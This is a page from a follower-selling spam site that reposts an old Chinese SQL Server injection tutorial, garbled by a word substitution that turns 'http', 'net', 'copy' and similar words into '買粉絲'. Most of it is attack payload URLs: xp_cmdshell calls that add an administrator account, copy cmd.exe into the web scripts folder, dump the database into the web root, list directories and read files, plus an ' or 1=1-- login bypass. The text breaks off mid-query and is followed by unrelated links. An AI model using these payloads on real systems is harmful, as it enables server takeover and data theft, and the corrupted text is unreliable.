您现在的位置是:Instagram刷粉絲, Ins買粉絲自助下單平台, Ins買贊網站可微信支付寶付款 >
02 youtube官網網頁版設置密碼登錄框sql注入(登錄框的username參數存在sql注入該怎么用sqlmap)
Instagram刷粉絲, Ins買粉絲自助下單平台, Ins買贊網站可微信支付寶付款2024-06-20 18:04:39【】7人已围观
简介處理,頁面也與原頁面完全不同。如果數據庫用的是Access,那么情況就有所不同,第一個買粉絲的頁面與原頁面完全不同;第二個買粉絲,則視乎數據庫設置是否允許讀該系統表,一般來說是不允許的,所以與原買粉絲
如果數據庫用的是Access,那么情況就有所不同,第一個買粉絲的頁面與原頁面完全不同;第二個買粉絲,則視乎數據庫設置是否允許讀該系統表,一般來說是不允許的,所以與原買粉絲也是完全不同。大多數情況下,用第一個買粉絲就可以得知系統所用的數據庫類型,第二個買粉絲只作為開啟IIS錯誤提示時的驗證。
三、確定XP_CMDSHELL可執行情況
若當前連接數據的帳號具有SA權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行,則整個計算機可以通過以下幾種方法完全控制,以后的所有步驟都可以省
1、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and user>;0 news.asp執行異常但可以得到當前連接數據庫的用戶名(若顯示dbo則代表SA)。
2、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and db_name()>0 news.asp執行異常但可以得到當前連接的數據庫名。
3、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master..xp_cmdshell “買粉絲 user aaa bbb /add”-- (master是SQL-SERVER的主數據
庫;名中的分號表示SQL-SERVER執行完分號前的語句名,繼續執行其后面的語句;“—”號是注解,表示其后面的所有內容僅為注釋,系統并不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master..xp_cmdshell “買粉絲 localgroup administrators aaa /add”-- 把剛剛增加
的帳戶aaa加到administrators組中。
5、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;backuup database 數據庫名 to disk='c:\i買粉絲pub\買粉絲root\save.db' 則把得到的數據內容
全部備份到WEB目錄下,再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
6、通過復制CMD創建UNICODE漏洞
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master.dbo.xp_cmdshell “買粉絲py c:\winnt\system32\cmd.exe
c:\i買粉絲pub\scripts\cmd.exe” 便制造了一個UNICODE漏洞,通過此漏洞的利用方法,便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。
GO ON~!
當上述條件不成立時就要繼續下面的步驟
(一)、發現WEB虛擬目錄
只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置,進而得到USER權限。有兩種方法比較有效。
一是根據經驗猜解,一般來說,WEB虛擬目錄是:c:\i買粉絲pub\買粉絲root;
D:\i買粉絲pub\買粉絲root; E:\i買粉絲pub\買粉絲root等,而可執行虛擬目錄是:
c:\i買粉絲pub\scripts; D:\i買粉絲pub\scripts; E:\i買粉絲pub\scripts等。
二是遍歷系統的目錄結構,分析結果并發現WEB虛擬目錄;
先創建一個臨時表:temp
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));--
接下來:
1 我們可以利用xp_availablemedia來獲得當前所有驅動器,并存入temp表中:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--
我們可以通過查詢temp的內容來獲得驅動器列表及相關信息
2 我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,并寸入temp表中:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:
如果我們需要查看某個文件的內容,可以通過執行xp_cmdsell:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如:bulk insert temp(id) from 'c:\i買粉絲pub\買粉絲root\index.asp'
瀏覽temp就可以看到index.asp文件的內容了!通過分析各種ASP文件,可以得到大量系統信息,WEB建設與管理信息,甚至可以得到SA帳號的連接密碼。
當然,如果xp_cmshell能夠執行,我們可以用它來完成:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
通過xp_cmdshell我們可以看到所有想看到的,包括W3svc
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
C:\I買粉絲pub\AdminScripts\adsutil.vbs enum w3svc'
但是,如果不是SA權限,我們還可以使用
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
注意:
1、以上每完成一項瀏覽后,應刪除TEMP中的所有內容,刪除方法是:
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;delete from temp;--
2、瀏覽TEMP表的方法是:(假設TestDB是當前連接的數據庫名)
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0
得到表TEMP中第一條記錄id字段的值,并與整數進行比較,顯然news.asp工作異常,但在異常中卻可以發現id字段的值。假設發現的表名是xyz,則
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0
得到表TEMP中第二條記錄id字段的值。
(二)、上傳ASP木馬
所謂ASP木馬,就是一段有特殊功能的ASP代碼,并放入WEB虛擬目錄的Scripts下,遠程客戶通過IE就可執行它,進而得到系統的USER權限,實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法:
1、利用WEB的遠程管理功能
許多WEB站點,為了維護的方便,都提供了遠程管理的功能;也有不少WEB站點,其內容是對于不同的用戶有不同的訪問權限。為了達到對用戶權限的控制,都有一個網頁,要求用戶名與密碼,只有輸入了正確的值,才能進行下一步的操作,可以實現對WEB的管理,如上傳、下載文件,目錄瀏覽、修改配置等。
因此,若獲取正確的用戶名與密碼,不僅可以上傳ASP木馬,有時甚至能夠直接得到USER權限而瀏覽系統,上一步的“發現WEB虛擬目錄”的復雜操作都可省略。
用戶名及密碼一般存放在一張表中,發現這張表并讀取其中內容便解決了問題。以下給出兩種有效方法。
A、 注入法:
從理論上說,認證網頁中會有型如:
select * from admin where username='XXX' and password='YYY' 的語句,若在正式運行此句之前,沒有進行必要的字符過濾,則很容易實施SQL注入。
如在用戶名文本框內輸入:abc’ or 1=1-- 在密碼框內輸入:123 則SQL語句變成:
select * from admin where username='abc’ or 1=1 and password='123’
不管用戶輸入任何用戶名與密碼,此語句永遠都能正確執行,用戶輕易騙過系統,獲取合法身份。
B、猜解法:
基本思路是:猜解所有數據庫名稱,猜出庫中的每張表名,分析可能是存放用戶名與密碼的表名,猜出表中的每個字段名,猜出表中的每條記錄內容。
a 猜解所有數據庫名稱
買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select 買粉絲unt(*) from master.dbo.sysda
很赞哦!(45366)
相关文章
- 01 海外專營店買的東西沒有包裝(朋友們,學生黨有沒有淘寶平價化妝品店推薦呀?)
- 02 上海對外貿易大學專業碩士(國際經貿關系專業碩士?)
- 02 上海對外經貿大學附屬花園學校音樂老師(上經貿大附校花園學校怎么樣)
- 01 海外五仙山(出國需要哪些注意事項)
- 01 海外tiktok安裝教程(國際版tiktok使用教程)(1)
- 01 海外互聯網為啥一直跌(海外互聯網為什么一直跌)
- 02 上海對外經貿招生電話(上海對外經貿大學自主招生條件)
- 02 上海對外經貿大學附近租房(求一篇關于目前我國國內就業問題的短文,300-500字就好,內容一定要深刻,論點一定要鮮明。重謝!!)
- 01 海外WiFi怎么連接(我買的華為P8海外版的,連上了WIFI但上不了網?怎么回事?)
- 01 海外買東西需要身份證安全嗎(海外購需要提供身份證,有什么安全隱患)